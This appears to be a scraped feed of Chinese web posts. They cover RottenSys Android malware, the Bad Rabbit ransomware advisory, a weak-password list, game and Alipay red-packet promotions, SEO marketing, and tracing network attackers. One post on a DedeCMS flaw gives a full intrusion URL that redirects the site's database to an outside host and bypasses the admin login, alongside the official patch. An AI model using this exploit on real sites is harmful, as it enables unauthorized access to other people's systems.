3628
安卓手机遭RottenSys恶意攻击 360揭秘其花式“隐匿术” 预防RottenSys恶意攻击 可从用户自查系统做起 前不久,CheckPoint公司向大众披露了一款名为“RottenSys”(堕落的系统)的恶意软件,该软件会在入侵用户手机之后,伪装成“系统Wi-Fi服务”等应用,并通过不定期给用户推送广告或指定的APP来获取利益,这一非法行为轻则导致手机出现卡顿现象,重则甚至侵害到用户信息安全。随后,移动安全联盟(MSA)成员单位360、安天对此事件进行了追踪及详细技术分析。360安全团队表示,确认“RottenSys”主要是通过“刷机”或APP(再root)的方式,在手机到达用户手中前,在目标上安装部分RottenSys应用程序,从而达到感染传播的效果。 对此,360安全团队对“RottenSys”进行技术分析,并出具了《RottenSys事件分析报告》。报告中,360安全专家指出,该软件的主要伪装有多种类型,其中以“系统Wi-Fi服务”程序为主。而为了提高自身隐蔽性,静默安装权限获取、推迟操作设置、恶意模块云端下载等都是该程序精通的隐藏方式。而其主要传播途径则是经由一家名为“Tian Pai”的电话分销平台进行。据统计,从2018年1月1日至3月15日,安卓手机的感染总量已超18万。 “RottenSys”恶意软件 多种伪装下的暴利工具 据报告显示,RottenSys恶意软件的伪装应用不只有“系统Wi-Fi服务”这一种,还包括“每日黄历”、“畅米桌面”等其他程序。实际上,这些伪装应用并非手机系统自带,而是用户在未知第三方应用商店下载APP时意外感染。 “RottenSys”相关的应用程 此外,还有可能是在手机出厂前后、用户购买前的某一环节,RottenSys“不请自来”。360安全专家称,“Tian Pai”便是RottenSys乘虚而入的主要平台。也正因此,厂商被感染量的高低主要取决于该厂商在“Tian Pai”平台的出货量,出货量较高的厂商便成为了“RottenSys”感染的一个重要占比。 而RottenSys感染目标设备的主要途径分为软硬件两种方式。软件层面,不法分子间接通过APP安装或ROOT目标设备,让RottenSys潜伏于用户手机;硬件层面,不法分子则会直接接触目标设备,利用刷机的方法直接将目标系统变更,手机系统便会在用户不知情下藏有RottenSys。 钻研花式“隐匿术”只为暗度陈仓 据了解,RottenSys团伙活动始于2016年9月,在2017年经历爆发式增长后进入稳定增长期。相关数据显示,3月3日至12日仅10天时间,RottenSys恶意软件便产生了1325万次广告,其中超54万次转化为广告点击,并为该团伙盈利11.5万美元。从如此高的“转化率”和“营业额”足以看出,RottenSys恶意软件隐蔽性和盈利性极高。相关控制域名的活跃度 RottenSys恶意软件之所以具备较高隐蔽性,主要在于其自身有多种“隐匿术”加持。以所谓的系统Wi-Fi服务为例,它实质上为一个“下载器”并与其控制服务器通讯,在接受到不法分子的下载指令后,便会自行实施广告推广服务。 首先,“系统Wi-Fi服务”会伪装成系统服务进程,打着“向用户提供任何Wi-Fi相关服务”的旗号招摇过市。由于很多用户对这一伪装并不了解,大多数会误认为该程序不存在威胁,就不会进行删除或卸载的操作。另外,“系统Wi-Fi服务”还拥有巨大的敏感权限列表,如静默安装下载等,这也便更利于其暗中行事。一旦该程序入侵用户手机,就会有一大波广告来袭。“系统Wi-Fi服务”暗藏于用户系统中 为避免用户短时间内察觉出异常,“系统Wi-Fi服务”还有推迟操作的“应对策略”,用户中招后较长时间内它才会尝试接收、推送弹窗广告。而为了将恶意推广变得更加灵活,“系统Wi-Fi服务”的恶意模块则通过云端下载,并且使用开源的轻量级插件框架Small,在保证恶意模块隐秘加载的同时,促使模块之间代码不相互依赖。当然了,用户想要借助简单的关机和重启操作,也是清除不掉该恶意软件的,究其原因主要在于“系统Wi-Fi服务”使用了开源框架、广播等手段来确保自身长期存活。 在此,360安全专家再次提醒广大用户,购买手机或是下载安装APP,最好通过官方、正规渠道,第三方销售平台或应用商店都存有一定的安全隐患。此外,在使用手机的过程中,还可借助360手机卫士等安全管理软件,对应用程序及安装包进行安全扫描,以防恶意软件暗藏其中,一经发现,可使用360手机卫士尽早查杀,避免其给用户带来更为惨重的后果。 在大安全时代,用户所面临的移动威胁远不止此,诈骗电话、欺诈短信、钓鱼链接、木马病毒、勒索软件等,也是威胁用户移动安全的主要因素。因此,用户的移动安全更需要全方位守护,360手机卫士便独家创立“8+1”防护体系,为用户实时拦截钓鱼网站、拦截木马病毒、拦截诈骗电话、拦截诈骗短信、检测支付环境、保护交易短信、检测Wi-Fi安全、识别盗版软件。
7
0 2466天前
4375
一款新游戏奇迹MU:觉醒打等级到50级就有10q币 到160就有88q币 260就288q币当然这个是QQ登陆的登陆微信玩的,微信的是红包活动期间参与腾讯奇迹MU:觉醒举办的预约玩家尊享app手游试玩送红包活动,通过使用微信进入活动页面成功下载奇迹app手游客户端,并使用微信登录游戏,当角色等级达到50级可回到活动页面领取到9元微信红包奖励,角色等级达到160级可领取99元微信红包,角色等级达到260级可领取到199元微信红包奖励,活动期间红包奖励数量有限先到先得。所有链接一:https://game.weixin.qq.com/cgi-bin/actnew/newportalact/110341/V-Cjg16Ln1VyMxB24z--nQ/main_page?noticeid=90126473&act_id=110341&k=V-Cjg16Ln1VyMxB24z--nQ&pid=main_page链接2: https://game.weixin.qq.com/cgi-bin/actnew/newportalact/110398/JsegrELnNGT6_LrwciX0Xw/main_page?noticeid=90125060&act_id=110398&k=JsegrELnNGT6_LrwciX0Xw&pid=main_page链接3:https://game.weixin.qq.com/cgi-bin/actnew/newportalact/110386/XsIWWR0diMS2PT-HPoUAZQ/main_page?noticeid=90126529&act_id=110386&k=XsIWWR0diMS2PT-HPoUAZQ&pid=main_page链接4 :https://game.weixin.qq.com/cgi-bin/actnew/newportalact/110667/xz5GM02Jhq9YKAtmv8o8tA/main_page?act_id=110667&k=xz5GM02Jhq9YKAtmv8o8tA&pid=main_page链接5 :https://game.weixin.qq.com/cgi-bin/actnew/newportalact/110428/d4BsiHeEGI5aFFfsp-dCsg/main_page?act_id=110428&k=d4BsiHeEGI5aFFfsp-dCsg&pid=main_pageQQ登陆如何领取?可以通过在QQ本身那个活动进行领取点击游戏找到奇迹MU:觉醒进入活动即可看见活动截止2018.1.9 请小伙伴们抓紧噢
4
0 2548天前
3657
4062
打开支付宝扫码这个图,抽红包 抽到多少就领多少钱,支付宝官方活动抽到的红包可以抵扣现金支付,抽到多少抵扣多少。可以去超市用支付宝买东西用了。听说今天有人抽到了99多元操作:保持以下图片,使用支付宝二维码扫描,可随机获得红包,最高99元,每天一次支付宝红包领取可先用领取到的随机红包发送给身边的朋友,随机红包可代替支付宝零钱发出,发出后可让朋友再发回你,这样红包就拿到了,还有推广也可以获得随机红包哦
2
0 2572天前
3848
在网上用什么密码,是个比较头疼的事情,如果你不选好一点,可能你的密码就被黑客轻易破解了。SplashData列出了2011年网上最平常最烂的一些密码。这些密码其实有一些可预测的,比如键盘上的“qwerty” 和 “123456”,当然也有一些当下最流行的名字比如“ashley” 和 “michael”,不过有些如“monkey” 和 “shadow”也很容易被盗,但却比较难解释。很多网站现在都要求密码必须包括数字和字母,有些甚至还要求大小写。SplashData 列出了最容易被黑客盗取的密码, 看看有你的没?1. password2. 1234563.123456784. qwerty5. abc1236. monkey7. 12345678. letmein9. trustno110. dragon11. baseball12. 11111113. iloveyou14. master15. sunshine16. ashley17. bailey18. passw0rd19. shadow20. 12312321. 65432122. superman23. qazwsx24. michael25. football
6
0 2606天前
3423
近日,一款名为“Bad Rabbit”(坏兔子)的勒索软件在境外蔓延。国家互联网应急中心第一时间对该勒索软件进行分析,并就如何防护进行支招。10月24日, “Bad Rabbit”(坏兔子)勒索软件在境外蔓延,目前涉及的国家主要有俄罗斯、乌克兰、德国、土耳其等欧洲国家,受害者包括俄罗斯的国际文传电讯社、乌克兰敖德萨国际机场、乌克兰基辅地铁系统等欧洲多国基础设施。与之前的“Wannacry”与“Petya”不同,“Bad Rabbit”并未使用漏洞进行传播。攻击者通过攻陷合法网站,在合法网站中植入恶意代码,伪装成Adobe Flash升级更新弹窗,诱导用户主动点击下载并手动运行伪装成Adobe Flash的“Bad Rabbit”勒索软件。此勒索软件会加密感染者电脑中的文件,并提示受害者支付0.05比特币的赎金;此外,该勒索软件会扫描内网SMB共享,使用弱密码和Mimikatz工具获取登录凭证等手段尝试登录和感染内网其它主机。目前,该勒索软件主要在境外蔓延。根据CNCERT监测,10月24日至10月25日期间,境内仅发现极少量IP存在该勒索软件下载以及分发行为。疑似感染地区包括广东、河南、福建与北京。截止到此通报发布日期,我国境内尚未发现规模性感染。尽管此勒索软件并未利用漏洞进行大规模传播,但不排除后续出现利用漏洞进行传播的变种的可能。针对国内互联网用户, CNCERT的防护建议如下:1)检查系统中是否存在以下三个文件之一,若存在则说明已经感染该勒索软件,请立即清除:C:Windowsdispci.exeC:Windowsinfpub.datC:Windowscscc.dat2)安装并及时更新杀毒软件产品;3)及时关闭计算机以及网络设备上的445和139端口;4)及时更新系统安全补丁;5)关闭不必要的网络共享;6)使用强度较高的密码并定期更换,降低系统密码被破解的风险;7)不要轻信网站弹窗,请从官方网站或可信渠道下载软件更新;8)定期在不同的存储介质上备份计算机上的重要文件。勒索病毒是企业的大敌,也是用户所避之不及的东西。据报道,现在又出现了一款名为Bad Rabbit的勒索病毒,他已经开始在欧洲地区蔓延,俄罗斯多个新闻网站都已遭殃。 近日,有报告显示,一种新的恶意软件正在欧洲蔓延。被研究人员称之为“Bad Rabbit”的勒索病毒开始出现在俄罗斯和乌克兰,似乎正在影响土耳其和德国,不过目前传播情况还不太明晰。目前已发现病毒的目标包括乌克兰基础设施部门和基辅的公共交通系统。俄罗斯新闻社Interfax还发布了官方更新通告,表明已经受到黑客入侵,并正在努力恢复系统。卡巴斯基报告表示,俄罗斯新闻集团Fontanka.ru也受到了影响,并着重于初步分析受影响媒体的趋势。截至目前,卡巴斯基和ESET都注意到此次勒索病毒与NotPetya或ExPetr恶意软件有关。 卷入争议的俄罗斯安全公司在博客上写道:“我们的研究人员已经检测到多个受影响的网站,都是新闻或媒体类网站。根据我们的调查,这是有针对性的对企业网络的攻击,采取的方法与ExPetr攻击相似。但是,我们无法确认这与ExPetr是否有关。” 与其他通过被动方式传播的恶意软件不同的是,Bad Rabbit需要一个潜在的受害者下载并执行虚假的Adobe Flash安装程序文件才能感染。安全研究人员已经给出了针对恶意软件的早期“疫苗”,能够“接种到”已经感染的系统中。 创造Bad Rabbit的似乎是一名权游粉,该恶意软件引用了Daenerys Targaryen的龙和电视中颇受欢迎的灰虫子(Grey Worm)。 感染恶意软件的计算机会将用户跳转到.onion Tor域,用户需要支付0.05比特币(约276美元)来换取自己的数据。网站上的倒计时会显示赎金价格上涨前的剩余时间。虽然今年有一些破坏性恶意软件伪装成了勒索病毒,但是现在还不清楚Bad Rabbit在收到赎金后是否会解码。 像往常一样,我们不鼓励感染者支付赎金。第一,支付赎金并不能保证你能拿回自己的数据;第二,也是最重要的,拒绝支付赎金会有效阻止未来的勒索病毒攻击。 此次勒索病毒攻击是今年以来的第三次,此前两大攻击病毒分别是NotPetya和WannaCry。
6
0 2607天前
3103
众所周知,因使用简单、客户群多,织梦CMS一直被爆出许多漏洞。小编在群里得到织梦官方论坛某版主可靠消息:“DEDECMS爆严重安全漏洞,近期官方会发布相关补丁,望大家及时关注补丁动态。”入侵步骤如下:http://www.xx.com/织梦网站后台/login.php?dopost=login&validate=dcug&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root 把上面validate后面的字母改为当前的验证码,即可直接进入网站后台。小编分析了一下,此漏洞的前提是必须得到后台路径才能实现,因此大家一定要养成使用DEDECM建站时改后台名字的习惯。下面给出官方的解决办法:解决办法:找到include/common.inc.php文件,把foreach($_REQUEST as $_k=>$_v){var_dump($_k);if( strlen($_k)>0 && preg_match(‘#^(cfg_|GLOBALS)#’,$_k) ){exit(‘Request var not allow!’);}}换成//检查和注册外部提交的变量function CheckRequest(&$val) {if (is_array($val)) {foreach ($val as $_k=>$_v) {CheckRequest($_k);CheckRequest($val[$_k]);}} else{if( strlen($val)>0 && preg_match(‘#^(cfg_|GLOBALS)#’,$val) ){exit(‘Request var not allow!’);}}}CheckRequest($_REQUEST);
4
0 2608天前
482
3217
现在做SEO的人其实是非常的多,受到互联网趋势的冲击,哪怕是一个传统企业的小小老板,多少都对互联网有一定的了解,如果你说你不了解互联网,那就像人们不玩手机,不会打王者荣耀一样的尴尬,同样的道理,想要靠SEO去营销可不是单单了解就够了,不然谁都能发财了。SEO营销咱们这里说的是靠SEO营销,而不是靠SEO去推广,大家不妨想一想,为什么有的SEOer在企业把排名做上去了,但是老板却依然不满意;因为老板想的是靠SEO做营销,而并不光是要排名,对于老板而言如果想要一个排名的话,完全可以砸钱做竞价。那么问题来了?我们把排名做上去,但是老板的生意依然没有多大起色,这个责任到底出在哪里?出于客观分析,其实两者均有责任,先来说老板的责任在哪里?笔者之前也遇到一些奇葩的老板,认为SEO是不需要资金投入的,只需要交给工作人员去做就好,从而提出了一些不切实际的推广念想,例如一个月把竞争度热到可以煎鸡蛋的词做到首页去,或者是一天要达到多少精准流量,一天要吸多少精准粉。推广营销工作做不好,很大程度上是局限于老板的思维上,而员工又无法违背老板的意愿,只能埋头苦干。在这里给广大需要做SEO营销的老板一个建议,要做好SEO营销,除了招聘一个比较牛的SEO,还要懂得放权给优化人员。而再来说说优化人员的责任,很多SEOer认为做SEO的最终目的就是为了排名,每天盯着数据更新文章发外链,排名上去后就撒手不管了,也不做数据统计分析,这样的情况算是不错的,把排名做上去至少是一个实力的体现;而对于老板的要求,很多优化人员只能硬接了下来,导致长时间没做上去,时间浪费了,增加运营成本,作为一个专业的优化人员,应该用自己的专业理念说服老板按照自己的方式来处理,任何关键词都可以做上去,但是需要一个循环渐进的方法。那么接下来就说说靠SEO营销,光靠排名可不行呢?首先一点,SEO的排名不是短期内就做上去的,二来是即便做上去了,也需要精心的维护,防止同行的攻击,排名可以说是推广的最佳渠道了,但是如何让其进化成更好的营销渠道,就需要进一步去完善了。在这里岑辉宇在强调一遍,排名绝对不是SEO的终点,排名只能当成搜索引擎自然流量渠道的终点,而这恰恰是SEO营销的开始,而靠SEO做好营销,往往是从内容开始。1.想要做好SEO营销,先从用户调查开始如果你只是把传单发在客户手里,而不对他进行营销,那么你就失去了一个潜在的客户了,例如产品适用于那些客户群体?用户为什么要选购这款产品?选购这款产品前他有什么样的心理?针对男性居多还是女性居多?等等信息都可以做一个数据调查,可以通过网上的搜索数据,也可以通过QQ群的交流数据进行调查,因为用户想要与你合作,首先是有一个价值的肯定,也就是所谓的“价值互换”。而有了这些数据,往往营销起来成功率会更高。2.制造用户情绪波动,从学会讲故事开始文字的力量是非常强大的,这也是自媒体发展如此快速的原因,文字内容可以不要太华丽,但是要能让用户产生情绪上的波动,从而产生共鸣,多站在用户的角度考虑问题,而不是站在推销产品的角度去思考,这样才能让用户信任你。记得周星驰主演的一部《千王之王》电影中就有这样的桥段,至今还记得。“对不起,其实今天不是我的生日,而是我老爸的忌辰,因为我老婆弄错了,所以大家不用太高兴。”说完吃瓜群众低下了头。“不过大家也不用太伤心,因为我老爸是个大混蛋,他抢劫杀人强奸无所不为,他的死呢,我觉得其实是社会之福。”说完众人又高兴的抬头。“不过,我老爸其实很疼我的,他去抢劫银行,其实是想给我买辆玩具车,杀人也只是对方说我不够英俊,强奸妇女只是因为我跟他说我想要一个妹妹,他真的是个好父亲。”众人又悲伤的低下了头。而很多人又有疑问了,这个和营销有什么关系?那么在举例一个例子,如果你是卖减肥产品的,排名做上去后,如何维护用户就是个关键了,如何制作用户的情绪波动,要先站在用户困难的角度去思考,诸如我之前也这样胖,我朋友也有这样的情况,然后在间接的提供减肥方法,想要营销首先要获得用户信任。一个优秀的案例故事能更好的走进用户的内心,提升成交率。3.学会利用图片的作用如果说一篇好的软文是一道菜,那么一张精美的图片就是菜里的盐,很多用户不会花费太多的时间去阅读内容,所以图片的作用就非常重要,做减肥产品的,放一个减肥前后对比照远比放产品图片要好得多,如果是机械的产品,不妨放上机械的产品图或者机械工作图最佳。4.如何写好一个故事和文采发挥很多人不知道如何去写故事,或者不知道如何利用故事借题发挥,咱们可以上一些软文网站去写,或者去网上搜索一些高考作文来看,建议大家搜索“零分作文”来看看,文采丝毫不输于满分作文,做软文内容千万不要放太多专业的白话,会影响用户的阅读体验。5.推广渠道不要局限于搜索引擎自然排名关于这一点已经说了无数遍了,我们要把搜索引擎自然排名当成一个流量的渠道,同时也要拓展其他的流量渠道,诸如论坛,贴吧,QQ群,门户平台,直播间等,都需要去挖掘更多的流量,而排名也不要只是盯着核心词,还要拓展出很多的长尾关键词,之前在前面也说了,营销的转换率,和关键词的选取有关,在这里就不做过多说明了。总结:想要靠SEO产生更大的营销,光靠排名完全不够的,要解决用户的最根本的问题,虽然这一点笔者多次强调,但是很多人总把有排名就有营销混为一谈,如果你想要靠SEO做好营销,首先要学会做好故事内容,一针见血的穿插到其中。营销的话题不是一篇文章就能讲述清楚的,大家不妨先学会如何做一个故事营销吧,因为用户只喜欢看小故事,而不是听大道理。文章来源于:长沙SEO http://www.xiaoyuncsseo.com/post/43.html
5
0 2661天前
3018
网络安全是一个综合的、复杂的工程,任何网络安全措施都不能保证万无一失。因此,对于一些重要的部门,一旦网络遭到攻击,如何追踪网络攻击,追查到攻击者并将其绳之以法,是十分必要的。 追踪网络攻击就是找到事件发生的源头。它有两个方面意义:一是指发现IP地址、MAC地址或是认证的主机名;二是指确定攻击者的身份。网络攻击者在实施攻击之时或之后,必然会留下一些蛛丝马迹,如登录的纪录,文件权限的改变等虚拟证据,如何正确处理虚拟证据是追踪网络攻击的最大挑战。 在追踪网络攻击中另一需要考虑的问题是:IP地址是一个虚拟地址而不是一个物理地址,IP地址很容易被伪造,大部分网络攻击者采用IP地址欺骗技术。这样追踪到的攻击源是不正确的。使得以IP地址为基础去发现攻击者变得更加困难。因此,必须采用一些方法,识破攻击者的欺骗,找到攻击源的真正IP地址。 ★ netstat命令----实时察看文击者 使用netstat命令可以获得所有联接被测主机的网络用户的IP地址。Windows系列、Unix系列、Linux等常用网络操作系统都可以使用“netstat”命令。 使用“netstat”命令的缺点是只能显示当前的连接,如果使用“netstat”命令时攻击者没有联接,则无法发现攻击者的踪迹。为此,可以使用Scheduler建立一个日程安排,安排系统每隔一定的时间使用一次“netstat”命令,并使用netstat>>textfile格式把每次检查时得到的数据写入一个文本文件中,以便需要追踪网络攻击时使用。 ★ 日志数据--最详细的攻击记录 系统的日志数据提供了详细的用户登录信息。在追踪网络攻击时,这些数据是最直接的、有效的证据。但是有些系统的日志数据不完善,网络攻击者也常会把自己的活动从系统日志中删除。因此,需要采取补救措施,以保证日志数据的完整性。 Unix和Linux的日志 Unix和Linux的日志文件较详细的记录了用户的各种活动,如登录的ID的用户名、用户IP地址、端口号、登录和退出时间、每个ID最近一次登录时间、登录的终端、执行的命令,用户ID的账号信息等。通过这些信息可以提供ttyname(终端号)和源地址,是追踪网络攻击的最重要的数据。 大部分网络攻击者会把自己的活动记录从日记中删去,而且UOP和基于X Windows的活动往往不被记录,给追踪者带来困难。为了解决这个问题,可以在系统中运行wrapper工具,这个工具记录用户的服务请求和所有的活动,且不易被网络攻击者发觉,可以有效的防止网络攻击者消除其活动纪录。 Windows NT和Windows 2000的日志 Windows NT和Windows 2000有系统日志、安全日志和应用程序日志等三个日志,而与安全相关的数据包含在安全日志中。安全日志记录了登录用户的相关信息。安全日志中的数据是由配置所决定的。因此,应该根据安全需要合理进行配置,以便获得保证系统安全所必需的数据。 但是,Windows NT和Windows 2000的安全日志存在重大缺陷,它不记录事件的源,不可能根据安全日志中的数据追踪攻击者的源地址。为了解决这个问题,可以安装一个第三方的能够完整记录审计数据的工具。 防火墙日志 作为网络系统中的“堡垒主机”,防火墙被网络攻击者攻陷的可能性要小得多。因此,相对而言防火墙日志数据不太容易被修改,它的日志数据提供最理想的攻击源的源地址信息。 但是,防火墙也不是不可能被攻破的,它的日志也可能被删除和修改。攻击者也可向防火墙发动拒绝服务攻击,使防火墙瘫痪或至少降低其速度使其难以对事件做出及时响应,从而破坏防火墙日志的完整性。因此,在使用防火墙日志之前,应该运行专用工具检查防火墙日志的完整性,以防得到不完整的数据,贻误追踪时机。 ★ 原始数据包----比较可靠的分析方法 由于系统主机都有被攻陷的可能,因此利用系统日志获取攻击者的信息有时就不可靠了。所以,捕获原始数据包并对其数据进行分析,是确定攻击源的另一个重要的、比较可靠的方法。 包头数据分析 表1是一个原始数据包的IP包头数据。表中的第一行是最有用的数字。第一行的最后8位代表源地址。本例中的地址是0xd2、0x1d、0x84、0x96,对应的IP地址是210.45.132.150。通过分析原始数据包的包头数据,可以获得较为可靠的网络攻击者的IP地址,因为这些数据不会被删除或修改。但是,这种方法也不是完美无缺的,如果攻击者对其数据包进行加密,对收集到的数据包的分析就没有什么用处了。 表1 一个IP包头数据 0x0000 45c0 c823 0000 d306 6002 2c06 d21d 8496 0x0010 22ab b365 c234 0000 0000 4066 dd1d 8818 0x0020 7034 ecf8 0000 5b88 7708 b901 4a88 de34 0x0030 9812 a5c6 0011 8386 9618 0000 a123 6907 0x0040 55c5 0023 3401 0000 5505 b1c5 0000 0000 0x0050 0000 0000 0000 0000 0000 捕获数据包 在一个交换网络环境下捕获数据包比较困难,这主要是因为集线器和交换机在数据交换中本质的不同。集线器采用的是广播式传输,它不支持连接,而是把包发送到除源端口外的所有端口,与集线器相连的所有机器都可以捕获到通过它的数据包。而交换机支持端到端的连接,当一个数据包到达时交换机为它建立一个暂时的连接,数据包通过这个连接传到目的端口。所以,在交换环境下抓包不是一件容易的事。为了获得交换环境下的数据包,可以用下面方法解决: (1)把交换机的一个“spanning port”(生成端口)配置成象一个集线器一样,通过这个端口的数据包不再与目的主机建立连接,而是广播式地发送给与此端口相连的所有机器。设置一个包捕获主机,便可以捕获到通过“spaning port”的数据包。但是,在同一时刻,交换机只能由一个端口被设置成“spanning port”,因此,不能同时捕获多台主机的数据包。 (2)在交换机之间,或路由器和交换机之间安装一个集线器。通过集线器的数据包便可以被捕获主机捕获。 在用捕获数据包获取攻击者的源地址的方法中,有两个问题需要注意:一是保证包捕获主机由足够的存储空间,因为如果在捕获数据包时网络吞吐量很大的话,硬盘很快会被填满;二是在分析数据包时,可编制一段小程序自动分析,手工分析这么多的数据是不可能的。 ★ 搜索引擎----也许会有外的惊喜 利用搜索引擎获得网络攻击者的源地址,从理论上讲没有什么根据,但是它往往会收到意想不到的效果,给追踪工作带来意外惊喜。黑客们在Internet上往往有他们自己的虚拟社区,他们在那儿讨论网络攻击技术方法,同时炫耀自己的战果。因此,在那里经常会暴露他们攻击源的信息甚至他们的身份。 利用搜索引擎追踪网络攻击者的IP地址就是使用一些好的搜索引擎(如搜狐的搜索引擎)搜索网页,搜索关键词是攻击主机所在域名、IP地址或主机名,看是否有贴子是关于对上述关键词所代表的机器进行攻击的。虽然网络攻击者一般在发贴子时会使用伪造的源地址,但也有很多人在这时比较麻痹而使用了真实的源地址。因此,往往可以用这种方法意外地发现网络攻击者的踪迹。 由于不能保证网络中贴子源地址的真实性,所以,不加分析的使用可能会牵连到无辜的用户。然而,当与其方法结合起来使用时,使用搜索引擎还是非常有用的。
7
0 2665天前